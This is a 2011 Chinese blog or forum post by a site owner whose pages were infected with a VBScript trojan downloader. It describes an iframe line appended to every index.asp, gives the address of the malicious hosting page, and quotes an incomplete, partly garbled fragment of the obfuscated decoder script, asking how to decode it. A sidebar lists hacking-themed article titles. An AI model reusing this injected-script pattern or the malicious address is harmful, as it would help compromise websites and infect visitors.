Trojan.DL.VBS.Agent.r 脚本病毒 ASP解密
2011年04月18日
Trojan.DL.VBS.Agent.r 脚本病毒
问题:1.Trojan.DL.VBS.Agent.r 的情况
2.ASP解密 怎么用?
描述:
打开我的网站时,瑞星显示有这种病毒Trojan.DL.VBS.Agent.r
病毒位置:C:\Documents and Settings\Administrator.MS-E496B8708F13\Local Settings\Temporary Internet Files\Content.IE5
\ALNSDGZI xx[1].htm
下载整个网站,用最新瑞星查不出来。
后在网站的所有的index.asp(包括子目录)中都发现:代码中最后位置加了这么句代码:
打开这个页只有个 统计。又iframe了。
最后找到这个页:http://wydos.3322.org/kehu.htm
代码如下:(加密的)
hu="琳 >tpircs/""tpircSBV""=egaugnal tpircs "琳" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(hu))
下载WEBfree_web.exe 解密却不能运行。没有装VB。装个VB运行库还是少文件:richtx32.ocx
网上baidu了下,没有找到。
有高人在的请指点!小弟先谢了。
发表评论
-
[.net] 关于.net线程问题总结(二)
2012-01-20 09:01 511[.net] 关于.net线程问题总结(二) 2011年01 ... -
Informix 11.5 新特性概览
2012-01-20 09:01 1137Informix 11.5 新特性概览 ... -
JDK中还藏着一个宝贝 它的名字叫做VisualVM
2012-01-20 09:01 777JDK中还藏着一个宝贝 它的名字叫做VisualVM 201 ... -
JAVA输入输出流--字节流篇
2012-01-20 09:01 1034JAVA输入输出流--字节流 ... -
理解 Android 上的安全性
2012-01-20 09:01 551理解 Android 上的安全性 ... -
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集
2012-01-19 14:05 848xp、2003开3389+非net创建管理用户+Shift后门 ... -
【黑客】利用VBS脚本让QQ永远在线,等级速升
2012-01-19 14:05 565【黑客】利用VBS脚本让QQ永远在线,等级速升 2010年0 ... -
用vbs实现获取电脑硬件信息的脚本-1
2012-01-19 14:05 749用vbs实现获取电脑硬件信息的脚本-1 2011年11月19 ... -
Adsutil.vbs在脚本入侵中的妙用
2012-01-19 14:05 573Adsutil.vbs在脚本入侵中的妙用 2011年03月0 ... -
内存绘图
2012-01-17 03:55 688内存绘图 2010年10月07日 经常出现图形闪烁的 ... -
read
2012-01-17 03:55 406read 2010年11月16日 运行某些程序的时候, ... -
系统出现内存不能为"Read"或"written"
2012-01-17 03:55 623系统出现内存不能为"Read"或" ... -
内存不能为"read"和内存不能为"write"的处理
2012-01-17 03:55 588内存不能为"read"和内存不能为&quo ... -
系统出现内存不能为"Read"或"written"的原因
2012-01-17 03:55 715系统出现内存不能为&quo ... -
C# Socket网络编程学习(1-->3)
2012-01-16 02:43 677C# Socket网络编程学习(1-- ... -
C# Socket实现Http WEB服务器
2012-01-16 02:43 794C# Socket实现Http WEB服务器 2010年03 ... -
C++ socket编程基础(理论篇)[转]
2012-01-16 02:42 607C++ socket编程基础(理论 ... -
C# Raw Socket完成网络封包监视
2012-01-16 02:42 564C# Raw Socket完成网络封包监视 2009年07月 ... -
java socket连接c/s (转)
2012-01-16 02:42 506java socket连接c/s (转) 2010年07月0 ...
相关推荐
安铁诺Trojan.VBS.StartPage.dy专杀 V2010.exe。针对1KB病毒
俄罗斯安全软件Dr.Web,Trojan. Plastix木马感染文件解除工具plstfix
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
RakhniDecryptor,即卡巴斯基Rakhni勒索病毒解密工具,可以解密Rakhni在内的15种勒索病毒软件,其中还包括一款安卓勒索软件"Trojan-Ransom.AndroidOS.Pletor",如果你的电脑或安卓手机感染了勒索病毒,可以使用该...
俄罗斯安全软件大蜘蛛Dr.Web,木马解锁工具.
敲诈者木马程序以敲诈勒索钱财为目的,使得感染该木马的计算机用户系统中的指定数据文件被恶意隐藏,造成用户数据丢失。截至目前为止,在国内已经出现了因感染该木马程序而导致计算机系统数据文件丢失的情况。...
我的电脑让学生插了一下U盘,结果电脑出现中毒现象(变慢、经常蓝屏、出错、自动重启),一查是染上了 假冒腾迅TXPLATFORM.EXE 的U盘病毒,属于 Trojan.Generic.Is.536802,此文介绍查杀方法
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
js.scob.trojan
2020年trojan最新windows64客户端
通过对 “冰河”、 “蓝色火焰”、 “BO”、 “广外女生”、 “黑洞”、 “网结”病毒(Worm.Plexus.b)、 “将死者”病毒(Worm.Gone.38912)、 “恶鹰”病毒(Worm.Beagle)、 “网络天空”病毒(Worm.NetSky)、传奇叛逆...
NULL 博文链接:https://polygoncell.iteye.com/blog/733264
针对Trojan-Dropper.Win32.Dropkit.a病毒,清除所需要的工具包,包括金山反间谍2007、PowerRmv、sreng2.5
RannohDecryptor是卡巴斯基推出的一个Rannoh勒索病毒解密工具,可以解密Rannoh在内的7款勒索软件加密的文件,包括Polyglot、Rannoh、AutoIt、Fury、Crybola、Cryakl以及CryptXXX,您的电脑感染了勒索病毒,重要文件...
Trojan is a stable and efficient mobile lightweight log SDK that not only records general logs, such as Http, power changes, component life cycles, but also records the definition of the log, which it...
新增106个新U盘类病毒的查杀,其中包括autorun.vbs system.exe Trojan.Win32.GameOlx.ir;BoyFine Worm-Script.VBS.Autorun.bc;nar.vbs Worm.Script.VBS.7474;.MS32DLL.dll.exe..VBs Worm.Script.VBS.Autorun.a;...
IDA脚本解密Zbot示例中的加密字符串 Zelix Klassmaster字符串解密器 Gen4字符串解密器Backdoor.Miniduke!gen4 Trojan.Netweird记录的密钥解密器 分析感染Trojan.Ransomlock.AP(Trojan.Ransomlk.AP!inf)的Advapi...
可查杀最新木马,主要用于查杀Trojan.Malscript!html等易中木马